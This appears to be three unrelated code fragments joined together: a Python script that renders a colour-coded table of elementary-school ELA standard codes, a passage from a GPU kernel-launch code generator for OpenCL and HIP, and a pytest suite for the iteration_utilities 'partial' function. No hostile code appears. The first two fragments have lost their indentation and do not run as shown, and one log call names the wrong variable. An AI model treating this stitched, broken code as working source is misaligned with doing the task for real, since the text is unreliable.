["", "", "", "", "", "L.2.4.D", "L.3.4.D", "", ""],
["", "", "", "", "", "L.2.4.E", "", "", ""],
["", "", "", "L.K.5", "L.1.5", "L.2.5", "L.3.5", "L.4.5", "L.5.5"],
["", "", "", "L.K.5.A", "L.1.5.A", "L.2.5.A", "L.3.5.A", "L.4.5.A", "L.5.5.A"],
["", "", "", "L.K.5.B", "L.1.5.B", "L.2.5.B", "L.3.5.B", "L.4.5.B", "L.5.5.B"],
["", "", "", "L.K.5.C", "L.1.5.C", "", "L.3.5.C", "L.4.5.C", "L.5.5.C"],
["", "", "", "L.K.5.D", "L.1.5.D", "", "", "", ""],
["", "", "", "L.K.6", "L.1.6", "L.2.6", "L.3.6", "L.4.6", "L.5.6"],
["2", "Speaking & Listening(K-5)", "Comprehension and Collaboration", "SL.K.1", "SL.1.1", "SL.2.1",
"SL.3.1", "SL.4.1", "SL.5.1.1"],
["", "", "", "SL.K.1.A", "SL.1.1.A", "SL.2.1.A", "SL.3.1.A", "SL.4.1.A", "SL.5.1.1.A"],
["", "", "", "SL.K.1.B", "SL.1.1.B", "SL.2.1.B", "SL.3.1.B", "SL.4.1.B", "SL.5.1.1.B"],
["", "", "", "", "SL.1.1.C", "SL.2.1.C", "SL.3.1.C", "SL.4.1.C", "SL.5.1.1..C"],
["", "", "", "", "", "", "SL.3.1.D", "SL.4.1.D", "SL.5.1.1.D"],
["", "", "", "SL.K.2", "SL.1.2", "SL.2.2", "SL.3.2", "SL.4.1.2", "SL.5.2"],
["", "", "", "SL.K.3", "SL.1.3", "SL.2.3", "SL.3.3", "SL.4.1.3", "SL.5.3"],
["", "", "Presentation of Knowledge and Ideas", "SL.K.4", "SL.1.4", "SL.2.4", "SL.3.4", "SL.4.1.4",
"SL.5.4"],
["", "", "", "SL.K.5", "SL.1.5", "SL.2.5", "SL.3.5", "SL.4.1.5", "SL.5.5"],
["", "", "", "SL.K.6", "SL.1.6", "SL.2.6", "SL.3.6", "SL.4.1.6", "SL.5.6"],
["3", "Writing", "Text Types and Purposes", "W.K.1", "W.1.1", "W.2.1", "W.3.1", "W.4.1", "W.5.1"],
["", "", "", "", "", "", "W.3.1.A", "W.4.1.A", "W.5.1.A"],
["", "", "", "", "", "", "W.3.1.B", "W.4.1.B", "W.5.1.B"],
["", "", "", "", "", "", "W.3.1.C", "W.4.1.C", "W.5.1.C"],
["", "", "", "", "", "", "W.3.1.D", "W.4.1.D", "W.5.1.D"],
["", "", "", "W.K.2", "W.1.2", "W.2.2", "W.3.2", "W.4.2", "W.5.2"],
["", "", "", "", "", "", "W.3.2.A", "W.4.2.A", "W.5.2.A"],
["", "", "", "", "", "", "W.3.2.B", "W.4.2.B", "W.5.2.B"],
["", "", "", "", "", "", "W.3.2.C", "W.4.2.C", "W.5.2.C"],
["", "", "", "", "", "", "W.3.2.D", "W.4.2.D", "W.5.2.D"],
["", "", "", "", "", "", "", "W.4.2.E", "W.5.2.E"],
["", "", "", "W.K.3", "W.1.3", "W.2.3", "W.3.3", "W.4.3", "W.5.3"],
["", "", "", "", "", "", "W.3.3.A", "W.4.3.A", "W.5.3.A"],
["", "", "", "", "", "", "W.3.3.B", "W.4.3.B", "W.5.3.B"],
["", "", "", "", "", "", "W.3.3.C", "W.4.3.C", "W.5.3.C"],
["", "", "", "", "", "", "W.3.3.D", "W.4.3.D", "W.5.3.D"],
["", "", "", "", "", "", "", "W.4.3.E", "W.5.3.E"],
["", "", "Production and Distribution of Writing", "W.K.4", "W.1.4", "W.2.4", "W.3.4", "W.4.4", "W.5.4"],
["", "", "", "W.K.5", "W.1.5", "W.2.5", "W.3.5", "W.4.5", "W.5.5"],
["", "", "", "W.K.6", "W.1.6", "W.2.6", "W.3.6", "W.4.6", "W.5.6"],
["", "", "Research to Build and Present Knowledge", "W.K.7", "W.1.7", "W.2.7", "W.3.7", "W.4.7",
"W.5.7"],
["", "", "", "W.K.8", "W.1.8", "W.2.8", "W.3.8", "W.4.8", "W.5.8"],
["", "", "", "W.K.9", "W.1.9", "W.2.9", "W.3.9", "W.4.9", "W.5.9"],
["", "", "", "", "", "", "", "W.4.9.A", "W.5.9.A"],
["", "", "", "", "", "", "", "W.4.9.B", "W.5.9.B"],
["", "", "Range of Writing", "W.K.10", "W.1.10", "W.2.10", "W.3.10", "W.4.10", "W.5.10"],
["4", "Reading: Foundational Skills(K-5)", "Print Concepts", "RF.K.1", "RF.1.1", "", "", "", ""],
["", "", "", "RF.K.1.A", "RF.1.1.A", "", "", "", ""],
["", "", "", "RF.K.1.B", "", "", "", "", ""],
["", "", "", "RF.K.1.C", "", "", "", "", ""],
["", "", "", "RF.K.1.D", "", "", "", "", ""],
["", "", "Phonological Awareness", "RF.K.2", "RF.1.2", "", "", "", ""],
["", "", "", "RF.K.2.A", "RF.1.2A", "", "", "", ""],
["", "", "", "RF.K.2.B", "RF.1.2B", "", "", "", ""],
["", "", "", "RF.K.2.C", "RF.1.2.C", "", "", "", ""],
["", "", "", "RF.K.2.D", "RF.1.2.D", "", "", "", ""],
["", "", "", "RF.K.2.E", "", "", "", "", ""],
["", "", "Phonics and Word Recognition", "RF.K.3", "RF.1.3", "RF.2.3", "RF.3.3", "RF.4.3", "RF.5.3"],
["", "", "", "RF.K.3.A", "RF.1.3.A", "RF.2.3.A", "RF.3.3.A", "RF.4.3.A", "RF.5.3.A"],
["", "", "", "RF.K.3.B", "RF.1.3.B", "RF.2.3.B", "RF.3.3.B", "", ""],
["", "", "", "RF.K.3.C", "RF.1.3.C", "RF.2.3.C", "RF.3.3.C", "", ""],
["", "", "", "RF.K.3.D", "RF.1.3.D", "RF.2.3.D", "RF.3.3.D", "", ""],
["", "", "", "", "RF.1.3.E", "RF.2.3.E", "", "", ""],
["", "", "", "", "RF.1.3.F", "RF.2.3.F", "", "", ""],
["", "", "", "", "RF.1.3.G", "", "", "", ""],
["", "", "Fluency", "RF.K.4", "RF.1.4", "RF.2.4", "RF.3.4", "RF.4.4", "RF.5.4"],
["", "", "", "", "RF.1.4.A", "RF.2.4.A", "RF.3.4.A", "RF.4.4.A", "RF.5.4.A"],
["", "", "", "", "RF.1.4.B", "RF.2.4.B", "RF.3.4.B", "RF.4.4.B", "RF.5.4.B"],
["", "", "", "", "RF.1.4.C", "RF.2.4.C", "RF.3.4.C", "RF.4.4.C", "RF.5.4.C"],
["5", "Reading Literature", "Key Ideas and Details", "RL.K.1", "RL.1.1", "RL.2.1", "RL.3.1",
"RL.4.1", "RL.5.1"],
["", "", "", "RL.K.2", "RL.1.2", "RL.2.2", "RL.3.2", "RL.4.2", "RL.5.2"],
["", "", "", "RL.K.3", "RL.1.3", "RL.2.3", "RL.3.3", "RL.4.3", "RL.5.3"],
["", "", "Craft and Structure", "RL.K.4", "RL.1.4", "RL.2.4", "RL.3.4", "RL.4.4", "RL.5.4"],
["", "", "", "RL.K.5", "RL.1.5", "RL.2.5", "RL.3.5", "RL.4.5", "RL.5.5"],
["", "", "", "RL.K.6", "RL.1.6", "RL.2.6", "RL.3.6", "RL.4.6", "RL.5.6"],
["", "", "Integration of Knowledge and Ideas", "RL.K.7", "RL.1.7", "RL.2.7", "RL.3.7", "RL.4.7", "RL.5.7"],
["", "", "", "RL.K.8", "RL.1.8", "RL.2.8", "RL.3.8", "RL.4.8", "RL.5.8"],
["", "", "", "RL.K.9", "RL.1.9", "RL.2.9", "RL.3.9", "RL.4.9", "RL.5.9"],
["", "", "Range of Reading and Level of Text Complexity", "RL.K.10", "RL.1.10", "RL.2.10", "RL.3.10",
"RL.4.10", "RL.5.10"],
["6", "Reading Standards for Informational Text(K-5)", "Key Ideas and Details", "RI.K.1", "RI.1.1",
"RI.2.1", "RI.3.1", "RI.4.1", "RI.5.1"],
["", "", "", "RI.K.2", "RI.1.2", "RI.2.2", "RI.3.2", "RI.4.2", "RI.5.2"],
["", "", "", "RI.K.3", "RI.1.3", "RI.2.3", "RI.3.3", "RI.4.3", "RI.5.3"],
["", "", "Craft and Structure", "RI.K.4", "RI.1.4", "RI.2.4", "RI.3.4", "RI.4.4", "RI.5.4"],
["", "", "", "RI.K.5", "RI.1.5", "RI.2.5", "RI.3.5", "RI.4.5", "RI.5.5"],
["", "", "", "RI.K.6", "RI.1.6", "RI.2.6", "RI.3.6", "RI.4.6", "RI.5.6"],
["", "", "Integration of Knowledge and Ideas", "RI.K.7", "RI.1.7", "RI.2.7", "RI.3.7", "RI.4.7", "RI.5.7"],
["", "", "", "RI.K.8", "RI.1.8", "RI.2.8", "RI.3.8", "RI.4.8", "RI.5.8"],
["", "", "", "RI.K.9", "RI.1.9", "RI.2.9", "RI.3.9", "RI.4.9", "RI.5.9"],
["", "", "Range of Reading and Level of Text Complexity", "RI.K.10", "RI.1.10", "RI.2.10", "RI.3.10",
"RI.4.10", "RI.5.10"]]
fig, ax = plt.subplots()
ax.axis('tight')
ax.axis('off')
the_table = ax.table(cellText=cell_text, cellColours=None,
colLabels=columns, loc='center', cellLoc='center')
fig.set_size_inches(14, 30)
# plt.figure(figsize=(1800, 1000))
the_table.auto_set_font_size(False)
the_table.set_fontsize(9)
the_table.auto_set_column_width(col=list(range(len(columns))))
the_table.scale(1, 0.24)
map_res = map_pro.map_ext_results.all()
log.info("Length of green cell is {}.".format(len(reading_2_5)))
for green_item_name in reading_2_5:
try:
indexes = indexes_dict[green_item_name]
except KeyError as err:
log.info("Item {} is not exist in map test table, error is: {}".format(green_item_name, err))
else:
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['green'])
for item_result in map_res:
item_name = item_result.check_item.item_name
item_level = item_result.item_level
try:
indexes = indexes_dict[item_name]
except KeyError as err:
log.info("Item {} is not exist in map test table, error is: {}".format(green_item_name, err))
else:
if item_level == "DEVELOP" or item_level == "REINFORCE_DEVELOP":
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['red'])
elif item_level == "REINFORCE":
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['yellow'])
else:
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['green'])
log.info("Item {}'s index is {}, with level {}".format(item_name, indexes, item_level))
file_path = str(settings.MEDIA_ROOT) + "/" + phone_number + '.pdf'
| |
"OCL":
if problemType["UseBeta"]:
s += "%scl_kernel kernelBetaOnly = betaZero ? kernel_%s : kernel_%s;\n" \
% (t, kernelNamesBetaOnly[0], kernelNamesBetaOnly[1])
else:
#s += "%sbool betaZero = true;\n" % (t)
s += "%scl_kernel kernelBetaOnly = kernel_%s;\n" \
% (t, kernelNamesBetaOnly[0])
argIdx = 0
s += "%sstatus = clSetKernelArg( kernelBetaOnly, %u, sizeof(cl_mem), &dataC ); tensileStatusCheck(status);\n" % (t, argIdx); argIdx+=1
# strides
for i in range(0,numStridesC):
s += "%sstatus = clSetKernelArg( kernelBetaOnly, %u, sizeof(unsigned int), &%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.strideList[i]); argIdx+=1
# sizes
for i in range(0, problemType["NumIndicesC"]):
s += "%sstatus = clSetKernelArg( kernelBetaOnly, %u, sizeof(unsigned int), &size%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.indexChars[i]); argIdx+=1
# beta
if problemType["UseBeta"]:
s += "%sif (!betaZero) {\n" % (t)
s += "%s status = clSetKernelArg( kernelBetaOnly, %u, sizeof(%s), &beta ); tensileStatusCheck(status);\n" % (t, argIdx, typeName); argIdx+=1
s += "%s}\n" % (t)
# enqueue
s += "%scl_event kernelEventBetaOnly;\n" % (t)
s += "%sstatus = clEnqueueNDRangeKernel(\n" % (t)
t += " "
s += "%sstream,\n" % (t)
s += "%skernelBetaOnly,\n" % (t)
s += "%sworkDim,\n" % (t)
s += "%sNULL, // globalWorkOffset\n" % (t)
s += "%sglobalWorkSizeBetaOnly,\n" % (t)
s += "%slocalWorkSizeBetaOnly,\n" % (t)
s += "%snumInputEvents,\n" % (t)
s += "%sinputEvents,\n" % (t)
#s += "%soutputEvent );\n" % (t)
s += "%s&kernelEventBetaOnly );\n" % (t)
t = t[2:]
s += "%stensileStatusCheck(status);\n" % (t)
if problemType["UseBeta"]:
s += "%sbeta = %s;\n" % (t, problemType["DataType"].zeroString(self.language, 1) )
#s += "%sreturn tensileStatusSuccess;\n" % (t)
s += "%sstatus = clFinish(stream);\n" % (t)
s += "%stensileStatusCheck(status);\n" % (t)
#s += " float tmp[128*128];\n"
#s += "clEnqueueReadBuffer(stream, dataC, CL_TRUE, 0, 128*128*sizeof(float), tmp, 0, NULL, NULL);\n"
#s += "for (unsigned int i = 0; i < 128*128; i++) { printf(\"%f\\n\", tmp[i]); }\n"
else:
s += "%stry {\n" % (t)
t += " "
# TODO - timing with beta kernels is somewhat pessimistic since it has this separate event only on the GSU path.
# Introduces 2-3us of overhead ; may want to disable PreciseKernelTime so non-GSU have same overhead.
# Long-term fix would be to launch the beta kernel with the hipHccModule* API and set start-event in that call
s += "%sif( inputEvents != NULL )\n" % (t)
s += "%s hipEventRecord(inputEvents[0], stream );\n" % (t)
s += "%skernelsLaunched++;\n" % (t)
s += "%shipLaunchKernelGGL(\n" % (t)
t += " "
s += "%sHIP_KERNEL_NAME(%s),\n" % (t, kernelNamesBetaOnly[0])
s += "%sdim3(globalWorkSizeBetaOnly[0], globalWorkSizeBetaOnly[1], globalWorkSizeBetaOnly[2]),\n" % (t)
s += "%sdim3(localWorkSizeBetaOnly[0], localWorkSizeBetaOnly[1], localWorkSizeBetaOnly[2]),\n" % (t)
s += "%s0, // groupMemBytes\n" % (t)
s += "%sstream,\n" % (t)
s += "%sworkspace,\n" % (t) if solution["_GlobalAccumulation"] else ("%sdataD,\n" % (t))
s += "%sdataC,\n" % (t)
# strides
if kernel["_GlobalAccumulation"]:
for i in range(0, numStridesC):
s += "%s%s,\n" % (t, WSstrides[i])
else:
for i in range(0, numStridesC):
s += "%s%s,\n" % (t, self.strideList[i])
for i in range(numStridesC, numStridesC*2):
s += "%s%s,\n" % (t, self.strideList[i])
# sizes
for i in range(0, problemType["NumIndicesC"]):
s += "%ssize%s,\n" % (t, self.indexChars[i])
s += ("%sbeta);\n" % (t)) if problemType["UseBeta"] else ("%s0.0f);\n" % (t))
t = t[:-2]
t = t[:-2]
s += "%s} catch (const std::exception& e) {\n" % (t)
t += " "
s += "#ifdef DEBUG\n"
s += "%s std::cerr << e.what() << std::endl;\n" % (t)
s += "#endif\n"
s += "%s return tensileStatusFailure;\n" % (t)
t = t[:-2]
s += "%s}\n" % (t)
########################################
# Enqueue Kernels
########################################
for kernelIdx in range(0, len(kernels)):
kernel = kernels[kernelIdx]
if kernel["KernelLanguage"] == "Source":
kernel["ISA"] = [0, 0, 0] # HIP source kernels needs dummy ISA version
kernelName = self.kernelWriter.getKernelName(kernel)
s += "\n%s/* kernel %u: %s */\n" % (t, kernelIdx, kernelName)
s += "%sunsigned int kernelIdx = %u;\n" % (t, kernelIdx)
if self.language == "OCL":
# set kernel args same for all enqueues
s += "%s// kernel args same for all enqueues\n" % (t)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataD ); tensileStatusCheck(status);\n" % (t, 0)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataC ); tensileStatusCheck(status);\n" % (t, 1)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataA ); tensileStatusCheck(status);\n" % (t, 2)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(cl_mem), &dataB ); tensileStatusCheck(status);\n" % (t, 3)
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(%s), &alpha ); tensileStatusCheck(status);\n" % (t, 4, typeName)
s += "%s%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(%s), &beta ); tensileStatusCheck(status);\n" % (t, \
"" if problemType["UseBeta"] else "//", 5, typeName)
argIdx = 6 if problemType["UseBeta"] else 5
for stride in self.strideList:
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(unsigned int), &%s ); tensileStatusCheck(status);\n" % (t, argIdx, stride)
argIdx += 1
for sizeIdx in range(0, problemType["TotalIndices"]):
if sizeIdx not in [ problemType["Index0"], problemType["Index1"], problemType["IndexUnroll"] ]:
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(unsigned int), &size%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.indexChars[sizeIdx])
argIdx += 1
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(staggerUIter), &staggerUIter ); tensileStatusCheck(status);\n" % (t, argIdx)
argIdx += 1
s += "%sfor (unsigned int enqueueIdx = 0; enqueueIdx < numEnqueues[%u]; enqueueIdx++) {\n" % (t, kernelIdx)
t += " "
# debug print kernel dimensions
if globalParameters["LibraryPrintDebug"]:
s += "%sprintf(\"%s: g{ %%u, %%u, %%u } l{ %%u, %%u, %%u}\\n\", static_cast<unsigned int>(globalWorkSize[kernelIdx][0]), static_cast<unsigned int>(globalWorkSize[kernelIdx][1]), static_cast<unsigned int>(globalWorkSize[kernelIdx][2]), static_cast<unsigned int>(localWorkSize[0]), static_cast<unsigned int>(localWorkSize[1]), static_cast<unsigned int>(localWorkSize[2]) );\n" % (t, kernelName)
# debug print kernel arguments
# strides
for stride in self.strideList:
s += "%sprintf(\" %s = %%u\\n\", %s);\n" % (t, stride, stride)
# sizes
for i in range(0, problemType["TotalIndices"]):
s += "%sprintf(\" sizes[kernelIdx][enqueueIdx][%u] = %%u\\n\", sizes[kernelIdx][enqueueIdx][%u] );\n" % (t, i, i )
s += "%sprintf(\" staggerUIter == %%u\\n\", staggerUIter );\n" % (t)
s += "%sprintf(\" problemNumGroupTiles0== %%u\\n\", problemNumGroupTiles0 );\n" % (t)
s += "%sprintf(\" problemNumGroupTiles1== %%u\\n\", problemNumGroupTiles1 );\n" % (t)
s += "%sprintf(\" tensor2dSizeC== %%lu\\n\", tensor2dSizeC );\n" % (t)
s += "%sprintf(\" tensor2dSizeA== %%lu\\n\", tensor2dSizeA );\n" % (t)
s += "%sprintf(\" tensor2dSizeB== %%lu\\n\", tensor2dSizeB );\n" % (t)
for idxChar in solution["PackedC0IdxChars"][:-1]:
s += "%sprintf(\" magicNumberSize%s== 0x%%lx, magicShiftSize%s== %%u)\\n\", magicNumberSize%s, magicShiftSize%s);\n" \
% (t, idxChar, idxChar, idxChar, idxChar)
for idxChar in solution["PackedC1IdxChars"][:-1]:
s += "%sprintf(\" magicNumberSize%s== 0x%%x, magicShiftSize%s== %%u)\\n\", magicNumberSize%s, magicShiftSize%s);\n" \
% (t, idxChar, idxChar, idxChar, idxChar)
s += "%sprintf(\" magicNumberProblemNumGroupTiles0==%%u\\n\", magicNumberProblemNumGroupTiles0);\n" % t
########################################
# OpenCL Runtime
########################################
if self.language == "OCL":
# set kernel args different for all enqueues
argIdx = 6 if problemType["UseBeta"] else 5
argIdx += len(self.strideList)
# sizes
for sizeIdx in range(0, problemType["TotalIndices"]):
if sizeIdx in [ problemType["Index0"], problemType["Index1"], problemType["IndexUnroll"] ]:
s += "%sstatus = clSetKernelArg( kernels[kernelIdx], %u, sizeof(unsigned int), &size%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.indexChars[sizeIdx])
argIdx += 1
# enqueue
s += "%sstatus = clEnqueueNDRangeKernel(\n" % (t)
t += " "
s += "%sstream,\n" % (t)
s += "%skernels[kernelIdx],\n" % (t)
s += "%sworkDim,\n" % (t)
s += "%sNULL, // globalWorkOffset\n" % (t)
s += "%sglobalWorkSize[kernelIdx],\n" % (t)
s += "%slocalWorkSize,\n" % (t)
if False: # gsu > 1:
s += "%s1,\n" % (t)
s += "%s&kernelEventBetaOnly,\n" % (t)
else:
s += "%snumInputEvents,\n" % (t)
s += "%sinputEvents,\n" % (t)
s += "%soutputEvent );\n" % (t)
s += "%stensileStatusCheck(status);\n" % (t)
t = t[:-2]
s += "%s}\n" % (t)
########################################
# HIP Runtime
########################################
else:
if not globalParameters["PreciseKernelTime"] or kernelLanguage == "Source":
s += "%sif( inputEvents != NULL )\n" % (t)
t += " "
s += "%shipEventRecord(inputEvents[enqueueIdx], stream );\n" % (t)
s += "%stry {\n" % (t)
t += " "
# hip kernel
if kernelLanguage == "Source":
s += "%skernelsLaunched++;\n" % (t)
s += "%shipLaunchKernelGGL(\n" % (t)
t += " "
s += "%sHIP_KERNEL_NAME(%s),\n" % (t, kernelName)
s += "%sdim3(globalWorkSize[kernelIdx][0], globalWorkSize[kernelIdx][1], globalWorkSize[kernelIdx][2]),\n" % (t)
s += "%sdim3(localWorkSize[0], localWorkSize[1], localWorkSize[2]),\n" % (t)
s += "%s0, // groupMemBytes\n" % (t)
s += "%sstream,\n" % (t)
s += ("%sdataD,\n") % (t) if not solution["_GlobalAccumulation"] else ("%sworkspace,\n" % (t))
s += ("%sdataC,\n") % (t) if not solution["_GlobalAccumulation"] else ("%sworkspace,\n" % (t))
s += "%sdataA,\n" % (t)
s += "%sdataB,\n" % (t)
s += "%salpha,\n" % (t)
s += "%s%sbeta,\n" % (t, \
| |
<filename>tests/test_partial.py
# Licensed under Apache License Version 2.0 - see LICENSE
import collections
import copy
import pickle
import sys
import weakref
import pytest
import iteration_utilities
from iteration_utilities import partial
from iteration_utilities._utils import IS_PYPY
import helper_funcs as _hf
from helper_cls import T, toT
# =============================================================================
# These tests are taken from the python tests.
#
# They were changed from unittest to pytest and made py2 and py3 compatible.
# =============================================================================
def capture(*args, **kw):
    """Record and return every positional and keyword argument received."""
    return args, kw
def signature(part):
    """Return the (func, args, keywords, __dict__) state of a partial object."""
    return tuple(getattr(part, field)
                 for field in ('func', 'args', 'keywords', '__dict__'))
class AllowPickle:
    """No-op context manager marking sections that pickle partial objects."""

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Never suppress exceptions raised inside the block.
        return False
class MyTuple(tuple):
    """Plain tuple subclass used to verify that partial normalizes state."""
class BadTuple(tuple):
    """Tuple subclass with a misbehaving __add__ that returns a list."""

    def __add__(self, other):
        # Deliberately break the tuple contract: concatenation yields a list.
        return list(self) + list(other)
class MyDict(dict):
    """Plain dict subclass used to verify that partial normalizes state."""
class MyStr(str):
    """Plain str subclass used by the partial tests."""
def test_attributes_unwritable():
    """func, args and keywords of a partial are read-only attributes."""
    p = partial(capture, T(1), T(2), a=T(10), b=T(20))
    for attr, value in [('func', map),
                        ('args', (T(1), T(2))),
                        ('keywords', {'a': T(1), 'b': T(2)})]:
        with pytest.raises(AttributeError):
            setattr(p, attr, value)
    # The instance __dict__ itself cannot be deleted either.
    p = partial(hex)
    with pytest.raises(TypeError):
        del p.__dict__
@_hf.skip_on_pypy_not_investigated_why
def test_recursive_pickle():
    # Pickling a partial that contains itself must either raise
    # RecursionError (self-reference via func) or faithfully reproduce
    # the cycle in the unpickled copy (self-reference via args/keywords).
    with AllowPickle():
        # Case 1: the partial is its own func -> dumping must fail.
        f = partial(capture)
        f.__setstate__((f, (), {}, {}))
        try:
            for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                with pytest.raises(RecursionError):
                    pickle.dumps(f, proto)
        finally:
            # Break the cycle so the object can be collected normally.
            f.__setstate__((capture, (), {}, {}))
        # Case 2: the partial appears in its own args -> the round-tripped
        # copy must reference itself as its first argument.
        f = partial(capture)
        f.__setstate__((capture, (f,), {}, {}))
        try:
            for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                f_copy = pickle.loads(pickle.dumps(f, proto))
                try:
                    assert f_copy.args[0] is f_copy
                finally:
                    # Break the copy's cycle before the next protocol.
                    f_copy.__setstate__((capture, (), {}, {}))
        finally:
            f.__setstate__((capture, (), {}, {}))
        # Case 3: the partial appears in its own keywords -> same guarantee.
        f = partial(capture)
        f.__setstate__((capture, (), {'a': f}, {}))
        try:
            for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                f_copy = pickle.loads(pickle.dumps(f, proto))
                try:
                    assert f_copy.keywords['a'] is f_copy
                finally:
                    f_copy.__setstate__((capture, (), {}, {}))
        finally:
            f.__setstate__((capture, (), {}, {}))
def test_repr():
    """repr() lists the wrapped func, then args, then keyword arguments."""
    args = (object(), object())
    args_repr = ', '.join(repr(a) for a in args)
    kwargs = {'a': object(), 'b': object()}
    # Keyword ordering inside the repr is unspecified; accept both.
    kwargs_reprs = ['a={a!r}, b={b!r}'.format(**kwargs),
                    'b={b!r}, a={a!r}'.format(**kwargs)]
    name = 'iteration_utilities.partial'

    assert repr(partial(capture)) == '{}({!r})'.format(name, capture)

    assert repr(partial(capture, *args)) == '{}({!r}, {})'.format(
        name, capture, args_repr)

    expected = ['{}({!r}, {})'.format(name, capture, kw)
                for kw in kwargs_reprs]
    assert repr(partial(capture, **kwargs)) in expected

    expected = ['{}({!r}, {}, {})'.format(name, capture, args_repr, kw)
                for kw in kwargs_reprs]
    assert repr(partial(capture, *args, **kwargs)) in expected
def test_basic_examples():
    """Stored args/kwargs are merged with call-time ones; call-time kw wins."""
    p = partial(capture, T(1), T(2), a=T(10), b=T(20))
    assert callable(p)
    expected = ((T(1), T(2), T(3), T(4)),
                {'a': T(10), 'b': T(30), 'c': T(40)})
    assert p(T(3), T(4), b=T(30), c=T(40)) == expected
    times10 = partial(map, lambda x: x * T(10))
    assert list(times10([T(1), T(2), T(3), T(4)])) == toT([10, 20, 30, 40])
def test_attributes():
    """func, args and keywords are all readable on a partial instance."""
    p = partial(capture, T(1), T(2), a=T(10), b=T(20))
    assert (p.func, p.args, p.keywords) == (
        capture, (T(1), T(2)), {'a': T(10), 'b': T(20)})
def test_argument_checking():
    """partial requires at least one argument, and it must be callable."""
    # No arguments at all.
    with pytest.raises(TypeError):
        partial()
    # First argument is not callable.
    with pytest.raises(TypeError):
        partial(T(2))
def test_protection_of_callers_dict_argument():
    """partial must never mutate a kwargs dict supplied by the caller."""
    def func(a=10, b=20):
        return a
    caller_kwargs = {'a': T(3)}
    p = partial(func, a=T(5))
    # The call-time value wins, and the caller's dict stays untouched.
    assert p(**caller_kwargs) == T(3)
    assert caller_kwargs == {'a': T(3)}
    p(b=7)
    assert caller_kwargs == {'a': T(3)}
def test_kwargs_copy():
    # Issue #29532: Altering a kwarg dictionary passed to a constructor
    # should not affect a partial object after creation
    d = {'a': T(3)}
    p = partial(capture, **d)
    assert p() == ((), {'a': T(3)})
    d['a'] = T(5)
    # Bug fix: the original `assert p(), ((), {'a': T(3)})` asserted a
    # two-element tuple (always truthy), so the comparison never ran.
    # Use `==` so the post-mutation check is actually enforced.
    assert p() == ((), {'a': T(3)})
def test_arg_combinations():
    """Zero stored args, zero call-time args, and both at once."""
    bare = partial(capture)
    assert bare() == ((), {})
    assert bare(T(1), T(2)) == ((T(1), T(2)), {})
    preloaded = partial(capture, T(1), T(2))
    assert preloaded() == ((T(1), T(2)), {})
    assert preloaded(T(3), T(4)) == ((T(1), T(2), T(3), T(4)), {})
def test_kw_combinations():
    """Keyword handling with/without stored keywords; call-time wins."""
    empty = partial(capture)
    assert empty.keywords == {}
    assert empty() == ((), {})
    assert empty(a=T(1)) == ((), {'a': T(1)})
    bound = partial(capture, a=T(1))
    assert bound.keywords == {'a': T(1)}
    assert bound() == ((), {'a': T(1)})
    assert bound(b=T(2)) == ((), {'a': T(1), 'b': T(2)})
    # A keyword given at call time overrides the stored one.
    assert bound(a=T(3), b=T(2)) == ((), {'a': T(3), 'b': T(2)})
def test_positional():
    """Stored positional args precede call-time ones, in order."""
    cases = [(), (T(0),), (T(0), T(1)),
             (T(0), T(1), T(2)), (T(0), T(1), T(2), T(3))]
    for stored in cases:
        p = partial(capture, *stored)
        got, kw = p(T('x'))
        assert got == stored + (T('x'),)
        assert kw == {}
def test_keyword():
    """Stored keyword args merge with call-time keyword args."""
    for value in [T('a'), T(0), T(None), T(3.5)]:
        p = partial(capture, a=T(value))
        pos, kw = p(x=T(None))
        assert pos == ()
        assert kw == {'a': T(value), 'x': T(None)}
def test_no_side_effects():
    """Calling a partial must not mutate its stored args/keywords."""
    p = partial(capture, T(0), a=T(1))
    assert p(T(1), b=T(2)) == ((T(0), T(1)), {'a': T(1), 'b': T(2)})
    # The stored state is unchanged after the previous call.
    assert p() == ((T(0),), {'a': T(1)})
def test_error_propagation():
    """Exceptions raised by the wrapped function propagate unchanged."""
    def f(x, y):
        x / y
    # The error must surface however the arguments were supplied.
    for trigger in (lambda: partial(f, 1, 0)(),
                    lambda: partial(f, 1)(0),
                    lambda: partial(f)(1, 0),
                    lambda: partial(f, y=0)(1)):
        with pytest.raises(ZeroDivisionError):
            trigger()
@_hf.skip_on_pypy_not_investigated_why
def test_weakref():
    """A partial is weak-referenceable; the proxy dies with the object."""
    f = partial(int, base=16)
    proxy = weakref.proxy(f)
    assert proxy.func == f.func
    f = None  # drop the only strong reference
    with pytest.raises(ReferenceError):
        proxy.func
def test_with_bound_and_unbound_methods():
    """partial works with unbound (str.join) and bound (''.join) methods."""
    data = [str(i) for i in range(10)]
    for join in (partial(str.join, ''), partial(''.join)):
        assert join(data) == '0123456789'
def test_nested_optimization():
    """Wrapping a partial in a partial flattens to a single level."""
    nested = partial(partial(signature, 'asdf'), bar=True)
    flat = partial(signature, 'asdf', bar=True)
    assert signature(nested) == signature(flat)
def test_nested_partial_with_attribute():
    """A partial of a partial still accepts instance attributes (issue 25137)."""
    def foo(bar):
        return bar
    inner = partial(foo, 'first')
    outer = partial(inner, 'second')
    outer.new_attr = 'spam'
    assert outer.new_attr == 'spam'
def test_recursive_repr():
    # repr() of a self-referential partial must not recurse forever; the
    # cycle is rendered as "..." wherever the partial contains itself.
    name = 'iteration_utilities.partial'
    # Self-reference through func.
    f = partial(capture)
